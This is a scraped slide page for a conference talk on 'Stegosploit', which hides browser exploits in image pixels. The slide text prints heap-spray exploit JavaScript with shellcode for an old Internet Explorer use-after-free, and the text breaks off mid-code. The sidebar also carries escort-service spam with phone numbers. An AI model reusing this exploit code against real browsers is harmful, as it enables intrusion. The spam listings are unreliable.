Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 

En vedette (10)

The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
 
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober20152016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
 

Similaire à Stegosploit - NCSC ONE 2016

Intro to computer vision in .net
Intro to computer vision in .netIntro to computer vision in .net
Intro to computer vision in .netStephen Lorello
 
Building Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter LuhBuilding Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter LuhFITC
 
I Can't Believe It's Not Flash
I Can't Believe It's Not FlashI Can't Believe It's Not Flash
I Can't Believe It's Not FlashThomas Fuchs
 
SVG's and their potential for programmatic art
SVG's and their potential for programmatic artSVG's and their potential for programmatic art
SVG's and their potential for programmatic artMichael Senkow
 
How to build a html5 websites.v1
How to build a html5 websites.v1How to build a html5 websites.v1
How to build a html5 websites.v1Bitla Software
 
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdfalokopticalswatchco0
 
CS101- Introduction to Computing- Lecture 41
CS101- Introduction to Computing- Lecture 41CS101- Introduction to Computing- Lecture 41
CS101- Introduction to Computing- Lecture 41Bilal Ahmed
 
Browsers with Wings
Browsers with WingsBrowsers with Wings
Browsers with WingsRemy Sharp
 
Computer vision Nebraska (Nebraska Code)
Computer vision Nebraska (Nebraska Code)Computer vision Nebraska (Nebraska Code)
Computer vision Nebraska (Nebraska Code)Andrew Rangel
 
Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
Making Games in WebGL - Aro Wierzbowski & Tomasz SzepczyńskiMaking Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
Making Games in WebGL - Aro Wierzbowski & Tomasz SzepczyńskiGrand Parade Poland
 
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVG
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVGJavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVG
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVGPatrick Chanezon
 
HTML5: where flash isn't needed anymore
HTML5: where flash isn't needed anymoreHTML5: where flash isn't needed anymore
HTML5: where flash isn't needed anymoreRemy Sharp
 
Webgl para JavaScripters
Webgl para JavaScriptersWebgl para JavaScripters
Webgl para JavaScriptersgerbille
 
I phone勉強会 (2011.11.23)
I phone勉強会 (2011.11.23)I phone勉強会 (2011.11.23)
I phone勉強会 (2011.11.23)Katsumi Kishikawa
 
лукьянченко л.а. пос 10а
лукьянченко л.а. пос 10алукьянченко л.а. пос 10а
лукьянченко л.а. пос 10аl10bov
 

Similaire à Stegosploit - NCSC ONE 2016 (20)

Intro to computer vision in .net
Intro to computer vision in .netIntro to computer vision in .net
Intro to computer vision in .net
 
Intro to HTML5
Intro to HTML5Intro to HTML5
Intro to HTML5
 
Building Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter LuhBuilding Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
 
I Can't Believe It's Not Flash
I Can't Believe It's Not FlashI Can't Believe It's Not Flash
I Can't Believe It's Not Flash
 
SVG's and their potential for programmatic art
SVG's and their potential for programmatic artSVG's and their potential for programmatic art
SVG's and their potential for programmatic art
 
RaphaëlJS magic
RaphaëlJS magicRaphaëlJS magic
RaphaëlJS magic
 
OWC 2012 (Open Web Camp)
OWC 2012 (Open Web Camp)OWC 2012 (Open Web Camp)
OWC 2012 (Open Web Camp)
 
How to build a html5 websites.v1
How to build a html5 websites.v1How to build a html5 websites.v1
How to build a html5 websites.v1
 
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
1. Modify code to change cube into pyramid.2. Make the pyramid int.pdf
 
CS101- Introduction to Computing- Lecture 41
CS101- Introduction to Computing- Lecture 41CS101- Introduction to Computing- Lecture 41
CS101- Introduction to Computing- Lecture 41
 
Browsers with Wings
Browsers with WingsBrowsers with Wings
Browsers with Wings
 
Computer vision Nebraska (Nebraska Code)
Computer vision Nebraska (Nebraska Code)Computer vision Nebraska (Nebraska Code)
Computer vision Nebraska (Nebraska Code)
 
D3.js and SVG
D3.js and SVGD3.js and SVG
D3.js and SVG
 
Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
Making Games in WebGL - Aro Wierzbowski & Tomasz SzepczyńskiMaking Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
 
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVG
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVGJavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVG
JavaOne 2009 - 2d Vector Graphics in the browser with Canvas and SVG
 
HTML5: where flash isn't needed anymore
HTML5: where flash isn't needed anymoreHTML5: where flash isn't needed anymore
HTML5: where flash isn't needed anymore
 
Webgl para JavaScripters
Webgl para JavaScriptersWebgl para JavaScripters
Webgl para JavaScripters
 
I phone勉強会 (2011.11.23)
I phone勉強会 (2011.11.23)I phone勉強会 (2011.11.23)
I phone勉強会 (2011.11.23)
 
GCD in Action
GCD in ActionGCD in Action
GCD in Action
 
лукьянченко л.а. пос 10а
лукьянченко л.а. пос 10алукьянченко л.а. пос 10а
лукьянченко л.а. пос 10а
 

Plus de Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

Plus de Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Dernier

'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...tanu pandey
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Sheetaleventcompany
 
SEO Growth Program-Digital optimization Specialist
SEO Growth Program-Digital optimization SpecialistSEO Growth Program-Digital optimization Specialist
SEO Growth Program-Digital optimization SpecialistKHM Anwar
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445ruhi
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLimonikaupta
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGAPNIC
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663Call Girls Mumbai
 

Dernier (20)

'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 
Call Girls In Noida 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In Noida 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In Noida 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In Noida 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Saket Delhi 💯Call Us 🔝8264348440🔝
 
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Defence Colony Delhi 💯Call Us 🔝8264348440🔝
 
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 6 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
SEO Growth Program-Digital optimization Specialist
SEO Growth Program-Digital optimization SpecialistSEO Growth Program-Digital optimization Specialist
SEO Growth Program-Digital optimization Specialist
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
 

Stegosploit - NCSC ONE 2016

  • 1. NETSQUARE PAINTING AN EXPLOIT IN AN IMAGE SAUMIL SHAH NCSC ONE 2016 STEGOSPLOIT
  • 2. NETSQUARE @therealsaumil saumilshah hacker, trainer, speaker, author, photographer educating, entertaining and exasperating audiences since 1999. Saumil Shah CEO, Net-Square NETSQUARE
  • 3. NETSQUARE A good exploit is one that is delivered in style
  • 4. NETSQUARE Agenda •  Stegosploit design goals •  Stegosploit-ing an exploit •  Steganography techniques •  The decoder •  Polyglot Images •  Conclusions
  • 5. NETSQUARENETSQUARE Stegosploit Design Goals •  Only VALID images on network and disk. •  Exploit code hidden in pixels. •  Self contained decoder code. •  Exploit automatically decoded and triggered upon loading... •  ...all with just ONE IMAGE, •  in STYLE!
  • 7. NETSQUARE Polyglots Two or more data formats in a single container... ...that co-exist happily without breaking each other's spec or syntax.
  • 8. NETSQUARE Stegosploit-ing a browser exploit IMAJS STEGO- DECODER JAVASCRIPT TARGET BROWSER POLYGLOT PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE Case study: CVE-2014-0282 -  IE CInput Use-After-Free -  hidden in a JPG Case study: CVE-2013-1690 -  FF onreadystatechange UAF -  hidden in a PNG
  • 9. NETSQUARE Step 1. Hiding the Exploit Code in the Image PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE
  • 10. NETSQUARE Hiding an Exploit in an Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . "SAUMIL" = 01010011 01000001 01010101 01001101 01001001 01001100
  • 11. NETSQUARE ganesha.jpg Hiding an Exploit in an Image function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;f<this.d.length;f+ +){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length<8){c='0'+c}var l=function(a) {return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a){for(var c=0,b=0;c<a.data.length;c++,b ++){if(b>=8192){b=0}a.data[c]=(b<this.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a) {this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfc xe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4a x26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8b x01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8b x58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a x51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8bx6fx87xffxd5xbb xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xff xd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)} c.push(1371756627);c.push(1371351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,2021212 48,16384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a<100;a++){c.push(document.createElement('img'))}if(flag) {document.getElementById('fm').innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a<110;a+=2){b 